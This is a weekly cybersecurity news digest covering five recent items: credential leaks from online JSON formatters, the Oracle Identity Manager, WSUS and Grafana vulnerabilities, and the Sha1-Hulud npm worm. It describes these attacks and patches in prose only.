11/19/2025-11/26/2025 JSONFormatter and CodeBeautify, Critical Oracle Identity Manager Flaw, Attackers Innovating on npm And More

1. Years of JSONFormatter and CodeBeautify Leaks Expose Thousands of Passwords and API Keys

New research shows that organizations across sensitive sectors — including governments, telecoms, and critical infrastructure — have been pasting passwords and credentials into online formatting tools like JSONFormatter and CodeBeautify. Cybersecurity firm watchTowr Labs collected over 80,000 publicly accessible files containing thousands of usernames, passwords, authentication keys, database and cloud credentials, API keys, and even SSH session recordings. The dataset includes five years of JSONFormatter history and one year from CodeBeautify, totaling over 5GB of exposed data. Affected sectors range from finance and healthcare to aerospace and cybersecurity.

The issue stems from these tools’ “save” feature, which creates predictable, shareable URLs that can be easily scraped. Researchers found leaked Jenkins secrets, bank KYC data, and AWS credentials—and even saw fake keys they uploaded targeted within 48 hours, indicating active exploitation. Following the findings, both sites disabled the save function, saying they are working on improved safety measures.

2. Critical Oracle Identity Manager Flaw Possibly Exploited as Zero-Day

A critical vulnerability (CVE-2025-61757) in Oracle Identity Manager, disclosed by Searchlight Cyber, may have been exploited as a zero-day before being patched in October 2025. This pre-authentication flaw allows attackers to bypass security, execute code, and fully compromise systems, potentially breaching servers containing sensitive user data.

The SANS Institute checked its honeypot logs after technical details were made public. They discovered scanning activity for the vulnerability occurring between August 30 and September 9—weeks before Oracle’s patch was available. This suggested potential early exploitation. However, Searchlight Cyber has since clarified that this observed activity was not from malicious actors. The company confirmed that the scans were conducted by its own security researchers as part of their investigation and efforts to notify organizations at risk. Therefore, while the vulnerability was severe, the pre-patch scanning appears to have been benign research.

3. The Second Coming of Shai-Hulud: Attackers Innovating on npm

The Shai-Hulud campaign has returned with improved automation and persistence, now rebranded as “Sha1-Hulud.” In days, it has generated thousands of malicious npm packages, even hijacking legitimate ones. First seen in 2025, the worm automatically clones itself across repositories; this new variant is more advanced and still spreading. Researchers at Wiz, Aikido, and Sonatype have identified over 2,100 malicious packages, showing how attackers now weaponize the same automation developers rely on.

Sha1-Hulud steals npm tokens, GitHub credentials, and cloud keys from infected systems, then uses them to publish new packages—turning developer pipelines into its distribution network. Large, complex samples helped it evade AI-based code analysis, with ChatGPT and Gemini incorrectly classifying the payloads as safe. This shift marks an evolution from compromising individual packages to exploiting the entire software ecosystem.

The campaign highlights accelerating attacker innovation and the need for rapid, automated defensive controls across dependency management, credentials, and CI/CD pipelines.

4. ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access

A critical vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, is being actively exploited to distribute the sophisticated ShadowPad malware. This flaw, a critical deserialization issue patched last month, allows attackers to execute remote code with system-level privileges.

Following the public release of a proof-of-concept exploit, threat actors have weaponized the vulnerability. They target exposed WSUS servers to gain initial access, using tools like PowerCat to obtain a system shell. They then leverage Windows utilities like certutil and curl to download and install ShadowPad from a remote server.

ShadowPad is a modular backdoor, widely considered a successor to PlugX and often linked to Chinese state-sponsored groups. It employs stealth techniques like DLL side-loading through a legitimate executable to launch its payload. Once active, the malware establishes a persistent presence and can load various plugins, posing a severe threat to compromised systems. This activity highlights the rapid weaponization of critical vulnerabilities.

5. Grafana Warns of Max Severity Admin Spoofing Vulnerability

Grafana Labs has disclosed a critical vulnerability (CVE-2025-41115) in Grafana Enterprise that could allow new users to be treated as administrators or enable privilege escalation. The flaw is only exploitable when SCIM provisioning is enabled, with both the enableSCIM flag and user_sync_enabled set to true. Due to a design issue, a malicious SCIM client could supply a numeric externalId—mapped directly to Grafana’s internal user.uid—allowing impersonation of existing accounts, including the admin user. SCIM remains a limited-support “Public Preview,” so exposure may be low.

The issue affects Grafana Enterprise versions 12.0.0–12.2.1; Grafana OSS is not impacted. Grafana Cloud and managed services have already been patched. Self-managed users should upgrade to versions 12.3.0, 12.2.1, 12.1.3, or 12.0.6, or disable SCIM. Grafana says the bug was discovered internally on November 4, fixed within 24 hours, and found not to be exploited in the cloud. Users are urged to patch immediately.